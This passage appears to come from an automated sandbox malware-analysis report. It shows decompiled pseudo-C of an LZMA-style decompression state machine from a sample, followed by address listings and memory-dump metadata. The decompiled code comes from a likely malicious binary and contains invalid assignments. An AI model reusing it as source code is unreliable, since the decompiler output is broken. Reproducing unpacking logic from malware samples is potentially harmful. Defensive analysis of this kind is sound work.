                                                  													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                  													goto L56;
                                                  												}
                                                  												L61:
                                                  												__eax =  *(__ebp - 0x58);
                                                  												__edx = __ebx + __ebx;
                                                  												__ecx =  *(__ebp - 0x10);
                                                  												__esi = __edx + __eax;
                                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  												__ax =  *__esi;
                                                  												 *(__ebp - 0x54) = __esi;
                                                  												__edi = __ax & 0x0000ffff;
                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  													__cx = __ax;
                                                  													_t217 = __edx + 1; // 0x1
                                                  													__ebx = _t217;
                                                  													__cx = __ax >> 5;
                                                  													__eflags = __eax;
                                                  													 *__esi = __ax;
                                                  												} else {
                                                  													 *(__ebp - 0x10) = __ecx;
                                                  													0x800 = 0x800 - __edi;
                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  													__ebx = __ebx + __ebx;
                                                  													 *__esi = __cx;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  												 *(__ebp - 0x44) = __ebx;
                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                  													goto L60;
                                                  												} else {
                                                  													goto L58;
                                                  												}
                                                  											case 0x10:
                                                  												L109:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0x10;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t365 = __ebp - 0x70;
                                                  												 *_t365 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t365;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												goto L111;
                                                  											case 0x11:
                                                  												L68:
                                                  												_t614 =  *(_t621 - 0x58);
                                                  												 *(_t621 - 0x84) = 0x12;
                                                  												while(1) {
                                                  													L132:
                                                  													 *(_t621 - 0x54) = _t614;
                                                  													goto L133;
                                                  												}
                                                  											case 0x12:
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													__eax =  *(__ebp - 0x58);
                                                  													 *(__ebp - 0x84) = 0x13;
                                                  													__esi =  *(__ebp - 0x58) + 2;
                                                  													while(1) {
                                                  														L132:
                                                  														 *(_t621 - 0x54) = _t614;
                                                  														goto L133;
                                                  													}
                                                  												}
                                                  												__eax =  *(__ebp - 0x4c);
                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                  												__ecx =  *(__ebp - 0x58);
                                                  												__eax =  *(__ebp - 0x4c) << 4;
                                                  												__eflags = __eax;
                                                  												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                  												goto L130;
                                                  											case 0x13:
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													_t469 = __ebp - 0x58;
                                                  													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                  													__eflags =  *_t469;
                                                  													 *(__ebp - 0x30) = 0x10;
                                                  													 *(__ebp - 0x40) = 8;
                                                  													L144:
                                                  													 *(__ebp - 0x7c) = 0x14;
                                                  													goto L145;
                                                  												}
                                                  												__eax =  *(__ebp - 0x4c);
                                                  												__ecx =  *(__ebp - 0x58);
                                                  												__eax =  *(__ebp - 0x4c) << 4;
                                                  												 *(__ebp - 0x30) = 8;
                                                  												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                  												L130:
                                                  												 *(__ebp - 0x58) = __eax;
                                                  												 *(__ebp - 0x40) = 3;
                                                  												goto L144;
                                                  											case 0x14:
                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                  												__eax =  *(__ebp - 0x80);
                                                  												 *(_t621 - 0x88) = _t542;
                                                  												goto L1;
                                                  											case 0x15:
                                                  												__eax = 0;
                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  												__al = __al & 0x000000fd;
                                                  												__eax = (__eflags >= 0) - 1 + 0xb;
                                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                  												goto L120;
                                                  											case 0x16:
                                                  												__eax =  *(__ebp - 0x30);
                                                  												__eflags = __eax - 4;
                                                  												if(__eax >= 4) {
                                                  													_push(3);
                                                  													_pop(__eax);
                                                  												}
                                                  												__ecx =  *(__ebp - 4);
                                                  												 *(__ebp - 0x40) = 6;
                                                  												__eax = __eax << 7;
                                                  												 *(__ebp - 0x7c) = 0x19;
                                                  												 *(__ebp - 0x58) = __eax;
                                                  												goto L145;
                                                  											case 0x17:
                                                  												L145:
                                                  												__eax =  *(__ebp - 0x40);
                                                  												 *(__ebp - 0x50) = 1;
                                                  												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                  												goto L149;
                                                  											case 0x18:
                                                  												L146:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0x18;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t484 = __ebp - 0x70;
                                                  												 *_t484 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t484;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												L148:
                                                  												_t487 = __ebp - 0x48;
                                                  												 *_t487 =  *(__ebp - 0x48) - 1;
                                                  												__eflags =  *_t487;
                                                  												L149:
                                                  												__eflags =  *(__ebp - 0x48);
                                                  												if( *(__ebp - 0x48) <= 0) {
                                                  													__ecx =  *(__ebp - 0x40);
                                                  													__ebx =  *(__ebp - 0x50);
                                                  													0 = 1;
                                                  													__eax = 1 << __cl;
                                                  													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                  													__eax =  *(__ebp - 0x7c);
                                                  													 *(__ebp - 0x44) = __ebx;
                                                  													while(1) {
                                                  														 *(_t621 - 0x88) = _t542;
                                                  														goto L1;
                                                  													}
                                                  												}
                                                  												__eax =  *(__ebp - 0x50);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  												__eax =  *(__ebp - 0x58);
                                                  												__esi = __edx + __eax;
                                                  												 *(__ebp - 0x54) = __esi;
                                                  												__ax =  *__esi;
                                                  												__edi = __ax & 0x0000ffff;
                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  													__cx = __ax;
                                                  													__cx = __ax >> 5;
                                                  													__eax = __eax - __ecx;
                                                  													__edx = __edx + 1;
                                                  													__eflags = __edx;
                                                  													 *__esi = __ax;
                                                  													 *(__ebp - 0x50) = __edx;
                                                  												} else {
                                                  													 *(__ebp - 0x10) = __ecx;
                                                  													0x800 = 0x800 - __edi;
                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  													 *__esi = __cx;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                  													goto L148;
                                                  												} else {
                                                  													goto L146;
                                                  												}
                                                  											case 0x19:
                                                  												__eflags = __ebx - 4;
                                                  												if(__ebx < 4) {
                                                  													 *(__ebp - 0x2c) = __ebx;
                                                  													L119:
                                                  													_t393 = __ebp - 0x2c;
                                                  													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                  													__eflags =  *_t393;
                                                  													L120:
                                                  													__eax =  *(__ebp - 0x2c);
                                                  													__eflags = __eax;
                                                  													if(__eax == 0) {
                                                  														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                  														goto L170;
                                                  													}
                                                  													__eflags = __eax -  *(__ebp - 0x60);
                                                  													if(__eax >  *(__ebp - 0x60)) {
                                                  														goto L171;
                                                  													}
                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                  													__eax =  *(__ebp - 0x30);
                                                  													_t400 = __ebp - 0x60;
                                                  													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                  													__eflags =  *_t400;
                                                  													goto L123;
                                                  												}
                                                  												__ecx = __ebx;
                                                  												__eax = __ebx;
                                                  												__ecx = __ebx >> 1;
                                                  												__eax = __ebx & 0x00000001;
                                                  												__ecx = (__ebx >> 1) - 1;
                                                  												__al = __al | 0x00000002;
                                                  												__eax = (__ebx & 0x00000001) << __cl;
                                                  												__eflags = __ebx - 0xe;
                                                  												 *(__ebp - 0x2c) = __eax;
                                                  												if(__ebx >= 0xe) {
                                                  													__ebx = 0;
                                                  													 *(__ebp - 0x48) = __ecx;
                                                  													L102:
                                                  													__eflags =  *(__ebp - 0x48);
                                                  													if( *(__ebp - 0x48) <= 0) {
                                                  														__eax = __eax + __ebx;
                                                  														 *(__ebp - 0x40) = 4;
                                                  														 *(__ebp - 0x2c) = __eax;
                                                  														__eax =  *(__ebp - 4);
                                                  														__eax =  *(__ebp - 4) + 0x644;
                                                  														__eflags = __eax;
                                                  														L108:
                                                  														__ebx = 0;
                                                  														 *(__ebp - 0x58) = __eax;
                                                  														 *(__ebp - 0x50) = 1;
                                                  														 *(__ebp - 0x44) = 0;
                                                  														 *(__ebp - 0x48) = 0;
                                                  														L112:
                                                  														__eax =  *(__ebp - 0x40);
                                                  														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                  															_t391 = __ebp - 0x2c;
                                                  															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                  															__eflags =  *_t391;
                                                  															goto L119;
                                                  														}
                                                  														__eax =  *(__ebp - 0x50);
                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  														__eax =  *(__ebp - 0x58);
                                                  														__esi = __edi + __eax;
                                                  														 *(__ebp - 0x54) = __esi;
                                                  														__ax =  *__esi;
                                                  														__ecx = __ax & 0x0000ffff;
                                                  														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                  														__eflags =  *(__ebp - 0xc) - __edx;
                                                  														if( *(__ebp - 0xc) >= __edx) {
                                                  															__ecx = 0;
                                                  															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                  															__ecx = 1;
                                                  															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                  															__ebx = 1;
                                                  															__ecx =  *(__ebp - 0x48);
                                                  															__ebx = 1 << __cl;
                                                  															__ecx = 1 << __cl;
                                                  															__ebx =  *(__ebp - 0x44);
                                                  															__ebx =  *(__ebp - 0x44) | __ecx;
                                                  															__cx = __ax;
                                                  															__cx = __ax >> 5;
                                                  															__eax = __eax - __ecx;
                                                  															__edi = __edi + 1;
                                                  															__eflags = __edi;
                                                  															 *(__ebp - 0x44) = __ebx;
                                                  															 *__esi = __ax;
                                                  															 *(__ebp - 0x50) = __edi;
                                                  														} else {
                                                  															 *(__ebp - 0x10) = __edx;
                                                  															0x800 = 0x800 - __ecx;
                                                  															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                  															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  															 *__esi = __dx;
                                                  														}
                                                  														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  														if( *(__ebp - 0x10) >= 0x1000000) {
                                                  															L111:
                                                  															_t368 = __ebp - 0x48;
                                                  															 *_t368 =  *(__ebp - 0x48) + 1;
                                                  															__eflags =  *_t368;
                                                  															goto L112;
                                                  														} else {
                                                  															goto L109;
                                                  														}
                                                  													}
                                                  													__ecx =  *(__ebp - 0xc);
                                                  													__ebx = __ebx + __ebx;
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                  													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  													 *(__ebp - 0x44) = __ebx;
                                                  													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                  														__ecx =  *(__ebp - 0x10);
                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  														__ebx = __ebx | 0x00000001;
                                                  														__eflags = __ebx;
                                                  														 *(__ebp - 0x44) = __ebx;
                                                  													}
                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                  														L101:
                                                  														_t338 = __ebp - 0x48;
                                                  														 *_t338 =  *(__ebp - 0x48) - 1;
                                                  														__eflags =  *_t338;
                                                  														goto L102;
                                                  													} else {
                                                  														goto L99;
                                                  													}
                                                  												}
                                                  												__edx =  *(__ebp - 4);
                                                  												__eax = __eax - __ebx;
                                                  												 *(__ebp - 0x40) = __ecx;
                                                  												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                  												goto L108;
                                                  											case 0x1a:
                                                  												L56:
                                                  												__eflags =  *(__ebp - 0x64);
                                                  												if( *(__ebp - 0x64) == 0) {
                                                  													 *(__ebp - 0x88) = 0x1a;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x68);
                                                  												__al =  *(__ebp - 0x5c);
                                                  												__edx =  *(__ebp - 8);
                                                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  												 *( *(__ebp - 0x68)) = __al;
                                                  												__ecx =  *(__ebp - 0x14);
                                                  												 *(__ecx +  *(__ebp - 8)) = __al;
                                                  												__eax = __ecx + 1;
                                                  												__edx = 0;
                                                  												_t192 = __eax %  *(__ebp - 0x74);
                                                  												__eax = __eax /  *(__ebp - 0x74);
                                                  												__edx = _t192;
                                                  												goto L79;
                                                  											case 0x1b:
                                                  												L75:
                                                  												__eflags =  *(__ebp - 0x64);
                                                  												if( *(__ebp - 0x64) == 0) {
                                                  													 *(__ebp - 0x88) = 0x1b;
                                                  													goto L170;
                                                  												}
                                                  												__eax =  *(__ebp - 0x14);
                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                  													__eflags = __eax;
                                                  												}
                                                  												__edx =  *(__ebp - 8);
                                                  												__cl =  *(__eax + __edx);
                                                  												__eax =  *(__ebp - 0x14);
                                                  												 *(__ebp - 0x5c) = __cl;
                                                  												 *(__eax + __edx) = __cl;
                                                  												__eax = __eax + 1;
                                                  												__edx = 0;
                                                  												_t274 = __eax %  *(__ebp - 0x74);
                                                  												__eax = __eax /  *(__ebp - 0x74);
                                                  												__edx = _t274;
                                                  												__eax =  *(__ebp - 0x68);
                                                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  												_t283 = __ebp - 0x64;
                                                  												 *_t283 =  *(__ebp - 0x64) - 1;
                                                  												__eflags =  *_t283;
                                                  												 *( *(__ebp - 0x68)) = __cl;
                                                  												L79:
                                                  												 *(__ebp - 0x14) = __edx;
                                                  												goto L80;
                                                  											case 0x1c:
                                                  												while(1) {
                                                  													L123:
                                                  													__eflags =  *(__ebp - 0x64);
                                                  													if( *(__ebp - 0x64) == 0) {
                                                  														break;
                                                  													}
                                                  													__eax =  *(__ebp - 0x14);
                                                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  													__eflags = __eax -  *(__ebp - 0x74);
                                                  													if(__eax >=  *(__ebp - 0x74)) {
                                                  														__eax = __eax +  *(__ebp - 0x74);
                                                  														__eflags = __eax;
                                                  													}
                                                  													__edx =  *(__ebp - 8);
                                                  													__cl =  *(__eax + __edx);
                                                  													__eax =  *(__ebp - 0x14);
                                                  													 *(__ebp - 0x5c) = __cl;
                                                  													 *(__eax + __edx) = __cl;
                                                  													__eax = __eax + 1;
                                                  													__edx = 0;
                                                  													_t414 = __eax %  *(__ebp - 0x74);
                                                  													__eax = __eax /  *(__ebp - 0x74);
                                                  													__edx = _t414;
                                                  													__eax =  *(__ebp - 0x68);
                                                  													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                  													__eflags =  *(__ebp - 0x30);
                                                  													 *( *(__ebp - 0x68)) = __cl;
                                                  													 *(__ebp - 0x14) = _t414;
                                                  													if( *(__ebp - 0x30) > 0) {
                                                  														continue;
                                                  													} else {
                                                  														L80:
                                                  														 *(__ebp - 0x88) = 2;
                                                  														goto L1;
                                                  													}
                                                  												}
                                                  												 *(__ebp - 0x88) = 0x1c;
                                                  												goto L170;
                                                  										}
                                                  									}
                                                  									L171:
                                                  									_t544 = _t543 | 0xffffffff;
                                                  									goto L172;
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  					goto L1;
                                                  				}
                                                  			}














                                                  0x0040625c
                                                  0x00406236
                                                  0x0040623b
                                                  0x0040623b
                                                  0x00406244
                                                  0x0040624c
                                                  0x0040624f
                                                  0x00000000
                                                  0x00406255
                                                  0x00406255
                                                  0x00000000
                                                  0x00406255
                                                  0x00000000
                                                  0x00406272
                                                  0x00406272
                                                  0x00406276
                                                  0x00406b22
                                                  0x00000000
                                                  0x00406b22
                                                  0x0040627f
                                                  0x0040628f
                                                  0x00406292
                                                  0x00406295
                                                  0x00406295
                                                  0x00406295
                                                  0x00406298
                                                  0x0040629c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040629e
                                                  0x004062a4
                                                  0x004062ce
                                                  0x004062d4
                                                  0x004062db
                                                  0x00000000
                                                  0x004062db
                                                  0x004062aa
                                                  0x004062ad
                                                  0x004062b2
                                                  0x004062b2
                                                  0x004062bd
                                                  0x004062c5
                                                  0x004062c8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040630d
                                                  0x00406313
                                                  0x00406316
                                                  0x00406323
                                                  0x0040632b
                                                  0x00000000
                                                  0x00000000
                                                  0x004062e2
                                                  0x004062e2
                                                  0x004062e6
                                                  0x00406b31
                                                  0x00000000
                                                  0x00406b31
                                                  0x004062f2
                                                  0x004062fd
                                                  0x004062fd
                                                  0x004062fd
                                                  0x00406300
                                                  0x00406303
                                                  0x00406306
                                                  0x0040630b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004069a2
                                                  0x004069a2
                                                  0x004069a8
                                                  0x004069ae
                                                  0x004069b4
                                                  0x004069ce
                                                  0x004069d1
                                                  0x004069d7
                                                  0x004069e2
                                                  0x004069e4
                                                  0x004069b6
                                                  0x004069b6
                                                  0x004069c5
                                                  0x004069c9
                                                  0x004069c9
                                                  0x004069ee
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406333
                                                  0x00406335
                                                  0x00406338
                                                  0x004063a9
                                                  0x004063ac
                                                  0x004063af
                                                  0x004063b6
                                                  0x004063c0
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x0040633a
                                                  0x0040633e
                                                  0x00406341
                                                  0x00406343
                                                  0x00406346
                                                  0x00406349
                                                  0x0040634b
                                                  0x0040634e
                                                  0x00406350
                                                  0x00406355
                                                  0x00406358
                                                  0x0040635b
                                                  0x0040635f
                                                  0x00406366
                                                  0x00406369
                                                  0x00406370
                                                  0x00406374
                                                  0x0040637c
                                                  0x0040637c
                                                  0x0040637c
                                                  0x00406376
                                                  0x00406376
                                                  0x00406376
                                                  0x0040636b
                                                  0x0040636b
                                                  0x0040636b
                                                  0x00406380
                                                  0x00406383
                                                  0x004063a1
                                                  0x004063a3
                                                  0x00000000
                                                  0x00406385
                                                  0x00406385
                                                  0x00406388
                                                  0x0040638b
                                                  0x0040638e
                                                  0x00406390
                                                  0x00406390
                                                  0x00406390
                                                  0x00406393
                                                  0x00406396
                                                  0x00406398
                                                  0x00406399
                                                  0x0040639c
                                                  0x00000000
                                                  0x0040639c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040663c
                                                  0x00406640
                                                  0x00406663
                                                  0x00406666
                                                  0x00406669
                                                  0x00406673
                                                  0x00406642
                                                  0x00406642
                                                  0x00406645
                                                  0x00406648
                                                  0x0040664b
                                                  0x00406658
                                                  0x0040665b
                                                  0x0040665b
                                                  0x0040699f
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040667f
                                                  0x00406683
                                                  0x00000000
                                                  0x00000000
                                                  0x00406689
                                                  0x0040668d
                                                  0x00000000
                                                  0x00000000
                                                  0x00406693
                                                  0x00406695
                                                  0x00406699
                                                  0x00406699
                                                  0x0040669c
                                                  0x004066a0
                                                  0x00000000
                                                  0x00000000
                                                  0x004066f0
                                                  0x004066f4
                                                  0x004066fb
                                                  0x004066fe
                                                  0x00406701
                                                  0x0040670b
                                                  0x0040699f
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x0040699f
                                                  0x004066f6
                                                  0x00000000
                                                  0x00000000
                                                  0x00406717
                                                  0x0040671b
                                                  0x00406722
                                                  0x00406725
                                                  0x00406728
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040672b
                                                  0x0040672e
                                                  0x00406731
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406744
                                                  0x00406749
                                                  0x00000000
                                                  0x00000000
                                                  0x004067d7
                                                  0x004067d7
                                                  0x004067db
                                                  0x00406b79
                                                  0x00000000
                                                  0x00406b79
                                                  0x004067e1
                                                  0x004067e4
                                                  0x004067e7
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f4
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f9
                                                  0x004067fc
                                                  0x00000000
                                                  0x00000000
                                                  0x004063cc
                                                  0x004063cc
                                                  0x004063d0
                                                  0x00406b3d
                                                  0x00000000
                                                  0x00406b3d
                                                  0x004063d6
                                                  0x004063d9
                                                  0x004063dc
                                                  0x004063e0
                                                  0x004063e3
                                                  0x004063e9
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063ee
                                                  0x004063f1
                                                  0x004063f1
                                                  0x004063f4
                                                  0x004063f7
                                                  0x00000000
                                                  0x00000000
                                                  0x004063fd
                                                  0x00406403
                                                  0x00000000
                                                  0x00000000
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640d
                                                  0x00406410
                                                  0x00406413
                                                  0x00406416
                                                  0x00406419
                                                  0x0040641a
                                                  0x0040641d
                                                  0x0040641f
                                                  0x00406425
                                                  0x00406428
                                                  0x0040642b
                                                  0x0040642e
                                                  0x00406431
                                                  0x00406434
                                                  0x00406437
                                                  0x00406453
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645c
                                                  0x00406463
                                                  0x00406467
                                                  0x00406469
                                                  0x0040646d
                                                  0x00406439
                                                  0x00406439
                                                  0x0040643d
                                                  0x00406445
                                                  0x0040644a
                                                  0x0040644c
                                                  0x0040644e
                                                  0x0040644e
                                                  0x00406470
                                                  0x00406477
                                                  0x0040647a
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406485
                                                  0x00406485
                                                  0x00406489
                                                  0x00406b49
                                                  0x00000000
                                                  0x00406b49
                                                  0x0040648f
                                                  0x00406492
                                                  0x00406495
                                                  0x00406499
                                                  0x0040649c
                                                  0x004064a2
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a7
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064b0
                                                  0x00000000
                                                  0x00000000
                                                  0x004064b2
                                                  0x004064b5
                                                  0x004064b8
                                                  0x004064bb
                                                  0x004064be
                                                  0x004064c1
                                                  0x004064c4
                                                  0x004064c7
                                                  0x004064ca
                                                  0x004064cd
                                                  0x004064d0
                                                  0x004064e8
                                                  0x004064eb
                                                  0x004064ee
                                                  0x004064f1
                                                  0x004064f1
                                                  0x004064f4
                                                  0x004064f8
                                                  0x004064fa
                                                  0x004064d2
                                                  0x004064d2
                                                  0x004064da
                                                  0x004064df
                                                  0x004064e1
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064fd
                                                  0x00406504
                                                  0x00406507
                                                  0x00000000
                                                  0x00406509
                                                  0x00000000
                                                  0x00406509
                                                  0x00406507
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406549
                                                  0x00406549
                                                  0x0040654d
                                                  0x00406b55
                                                  0x00000000
                                                  0x00406b55
                                                  0x00406553
                                                  0x00406556
                                                  0x00406559
                                                  0x0040655d
                                                  0x00406560
                                                  0x00406566
                                                  0x00406568
                                                  0x00406568
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406574
                                                  0x00406512
                                                  0x00406512
                                                  0x00406515
                                                  0x00000000
                                                  0x00406515
                                                  0x00406576
                                                  0x00406576
                                                  0x00406579
                                                  0x0040657c
                                                  0x0040657f
                                                  0x00406582
                                                  0x00406585
                                                  0x00406588
                                                  0x0040658b
                                                  0x0040658e
                                                  0x00406591
                                                  0x00406594
                                                  0x004065ac
                                                  0x004065af
                                                  0x004065b2
                                                  0x004065b5
                                                  0x004065b5
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065be
                                                  0x00406596
                                                  0x00406596
                                                  0x0040659e
                                                  0x004065a3
                                                  0x004065a5
                                                  0x004065a7
                                                  0x004065a7
                                                  0x004065c1
                                                  0x004065c8
                                                  0x004065cb
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x0040685a
                                                  0x0040685a
                                                  0x0040685e
                                                  0x00406b85
                                                  0x00000000
                                                  0x00406b85
                                                  0x00406864
                                                  0x00406867
                                                  0x0040686a
                                                  0x0040686e
                                                  0x00406871
                                                  0x00406877
                                                  0x00406879
                                                  0x00406879
                                                  0x00406879
                                                  0x0040687c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040662a
                                                  0x0040662a
                                                  0x0040662d
                                                  0x0040699f
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8f445da75e9a74604d226408adfd8c7b2685a98931b912d90ec5833448e5fd83
                                                  • Instruction ID: 1046eeffc13e12efe39df9970ac10e2b765b46b26c22898380a8ab994a27db31
